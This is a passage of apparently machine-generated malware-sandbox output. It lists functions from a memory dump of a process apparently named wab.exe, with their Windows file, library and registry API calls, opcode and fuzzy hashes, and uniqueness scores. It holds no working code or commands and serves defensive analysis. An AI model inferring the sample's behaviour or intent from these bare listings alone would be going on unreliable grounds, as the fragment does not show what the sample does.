                                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

